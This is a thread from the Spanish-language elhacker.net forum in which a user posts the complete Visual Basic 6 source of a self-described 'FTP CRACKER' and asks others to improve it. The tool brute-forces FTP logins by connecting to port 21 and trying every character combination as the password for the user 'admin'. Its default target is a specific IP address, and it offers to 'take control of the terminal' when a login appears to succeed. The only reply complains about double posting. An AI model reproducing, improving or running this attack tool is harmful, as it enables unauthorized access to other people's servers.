elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Recuerda que debes registrarte en el foro para poder participar (preguntar y responder)


+  Foro de elhacker.net
|-+  Programación
| |-+  Programación General
| | |-+  .NET (C#, VB.NET, ASP)
| | | |-+  Programación Visual Basic (Moderadores: LeandroA, seba123neo)
| | | | |-+  FTP CRACKER
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: FTP CRACKER  (Leído 3,422 veces)
79137913


Desconectado Desconectado

Mensajes: 1.169


4 Esquinas


Ver Perfil WWW
FTP CRACKER
« en: 4 Agosto 2010, 17:23 pm »

HOLA!!!

Hola amigos, estaba sin nada que hacer y me puse a programar un CRACKEADOR FTP por fuerza bruta en VB6, me puse a hacerlo por que no vi nada por la web :P, quisiera saber su opinion.

Bueno consiste en un form con:
  • Un textbox multilinea con scroll llamado inx
  • Un textbox normal llamado outx
  • Un timer llamado state
  • Un winsock llamado telnet

un FORM con Código:


Código
  1. Public CT As Integer
  2. Public FAILED As String
  3. Public ACUSER As String
  4. Public USER As String
  5. Public CONTROL As Integer
  6.  
  7. Private Sub Form_Load()
  8.    CONTROL = vbNo
  9.    Telnet.RemoteHost = InputBox("HOST", "INSERTE", "173.236.40.122")
  10.    Telnet.RemotePort = InputBox("PUERTO", "INSERTE", 21)
  11.    FAILED = InputBox("CODIGO DE CONTRASEÑA INVALIDA", "INSERTE", 530)
  12.    ACUSER = InputBox("CODIGO DE USUARIO ACEPTADO", "INSERTE", 331)
  13.    USER = InputBox("USUARIO", "INSERTE", "admin")
  14.    Call BORRAR_VECTOR
  15.    Call CONECTAR_TELNET
  16.    STATE.Interval = 1000
  17. End Sub
  18.  
  19. Private Sub CONECTAR_TELNET()
  20. Telnet.Connect
  21. CT = 0
  22. End Sub
  23.  
  24. Private Sub Form_Resize()
  25.    If Me.Height > 701 Then
  26.        inx.Width = Me.Width
  27.        inx.Height = Me.Height - 700
  28.        outx.Width = Me.Width
  29.        outx.Top = inx.Height
  30.    End If
  31. End Sub
  32.  
  33. Private Sub Form_Unload(Cancel As Integer)
  34.    Telnet.Close
  35.    End
  36. End Sub
  37.  
  38. Private Sub STATE_Timer()
  39.    If Telnet.STATE <> 7 Then
  40.        If Telnet.STATE <> 0 Then
  41.            Telnet.Close
  42.        End If
  43.        Call CONECTAR_TELNET
  44.    End If
  45. End Sub
  46.  
  47. Private Sub telnet_DataArrival(ByVal bytesTotal As Long)
  48.    Dim strData As String
  49.    Telnet.GetData strData
  50.    inx.Text = inx.Text & strData
  51.    If CONTROL = vbNo Then
  52.        Call ANALIZAR(Mid(strData, 1, 3))
  53.    End If
  54.    If CT Mod 2 Then
  55.        Call NUEVAPASS
  56.            outx.Text = "pass " & PASS
  57.            Call outx_KeyPress(vbKeyReturn)
  58.            Else
  59.            outx.Text = "user " & USER
  60.            Call outx_KeyPress(vbKeyReturn)
  61.    End If
  62. End Sub
  63.  
  64. Private Sub outx_KeyPress(KeyAscii As Integer)
  65.    If KeyAscii = vbKeyReturn Then
  66.        Telnet.SendData outx.Text & vbCrLf
  67.        outx.Text = ""
  68.        outx.SetFocus
  69.    End If
  70. End Sub
  71.  
  72. Private Sub ANALIZAR(CODE As String)
  73.    CT = CT + 1
  74.    If Not (CODE = ACUSER Or CT = 1 Or CODE = FAILED) Then
  75.        CONTROL = MsgBox("CODIGO EXTRAÑO(" & CODE & ") CON PASSWORD ''" & PASS & "'' DESEA TOMAR EL CONTROL DE LA TERMINAL (SI) O DESEA QUE CONTINUE EL ATAQUE DE FUERZA BRUTA (NO)", vbYesNo)
  76.    End If
  77. End Sub
  78.  






Y un MODULO con Código:

Código
  1. Dim PASSNUM(17) As Integer
  2. Dim PASSLET(17) As String
  3. Public PASS As String
  4.  
  5. Public Sub BORRAR_VECTOR()
  6.    PASSNUM(1) = 47
  7.    For X = 2 To 16
  8.        PASSNUM(X) = 0
  9.    Next X
  10. End Sub
  11.  
  12. Public Sub NUEVAPASS()
  13.    PASSNUM(1) = PASSNUM(1) + 1
  14.    Call ORDENAR
  15.    Call CONVERTIR
  16.    Call CONCATENAR
  17. End Sub
  18.  
  19. Private Sub ORDENAR()
  20.    For X = 1 To 16
  21.        If PASSNUM(X) = 124 Then
  22.            If PASSNUM(X + 1) = 0 Then
  23.                PASSNUM(X + 1) = 47
  24.            End If
  25.            PASSNUM(X + 1) = PASSNUM(X + 1) + 1
  26.        End If
  27.    Next X
  28.    If PASSNUM(17) = 1 Then
  29.        MsgBox "TODAS LAS CLAVES PROBADAS", , "ERROR"
  30.        End
  31.    End If
  32. End Sub
  33.  
  34. Private Sub CONVERTIR()
  35.    For X = 1 To 16
  36.        If PASSNUM(X) <> 0 Then
  37.            PASSLET(X) = Chr(PASSNUM(X))
  38.        End If
  39.    Next X
  40. End Sub
  41.  
  42. Private Sub CONCATENAR()
  43.    PASS = ""
  44.    For X = 1 To 16
  45.        PASS = PASS & PASSLET(X)
  46.    Next X
  47. End Sub
  48.  



Díganme que les parece!
Y den opiniones para mejorarlo!




***************GRACIAS***************


En línea

"Como no se puede igualar a Dios, ya he decidido que hacer, ¡SUPERARLO!"
"La peor de las ignorancias es no saber corregirlas"

 79137913                          *Shadow Scouts Team*
[L]ord [R]NA


Desconectado Desconectado

Mensajes: 1.513

El Dictador y Verdugo de H-Sec


Ver Perfil WWW
Re: FTP CRACKER
« Respuesta #1 en: 4 Agosto 2010, 19:42 pm »

No hagas doble post...

http://foro.elhacker.net/programacion_visual_basic/ftp_cracker_me_lo_revisan-t301333.0.html

No creo que esta sea la zona indicada, espera que alguien lo mueva o elimine.


En línea

79137913


Desconectado Desconectado

Mensajes: 1.169


4 Esquinas


Ver Perfil WWW
Re: FTP CRACKER
« Respuesta #2 en: 4 Agosto 2010, 21:15 pm »

HOLA!!!

No es doble Post, por que el post que figura en el foro de programacion es sobre un problema que tenia y que por suerte pude solucionar, si te fijas los codigos son diferentes.

Pido que me den una opinion ahora que esta funcional el sistema.

Y si este no es el subforo para que revisen el "CRACKER" que arme (humildemente lo digo, por que no es la gran cosa, es mas es muy rudimentario) transladen el post plz.

Pero ante todo:

***************GRACIAS***************
En línea

"Como no se puede igualar a Dios, ya he decidido que hacer, ¡SUPERARLO!"
"La peor de las ignorancias es no saber corregirlas"

 79137913                          *Shadow Scouts Team*
Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Mentalidad cracker?
Dudas Generales
x3r0x 5 3,137 Último mensaje 9 Enero 2012, 16:21 pm
por CloudswX
NECESITO UN CRACKER
Ingeniería Inversa
ulises2012 2 2,736 Último mensaje 6 Noviembre 2012, 06:23 am
por apuromafo CLS
[Ruby] MD5 Cracker 0.2
Scripting
BigBear 2 2,170 Último mensaje 30 Mayo 2015, 18:36 pm
por Kaxperday
Cursos de Cracking joe cracker y SACCOPhHARYNX
Ingeniería Inversa
Anonymous- 2 4,689 Último mensaje 19 Noviembre 2020, 15:56 pm
por MCKSys Argentina
Cracker
Hacking
Marlon357 2 2,329 Último mensaje 25 Noviembre 2021, 20:55 pm
por Marlon357
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines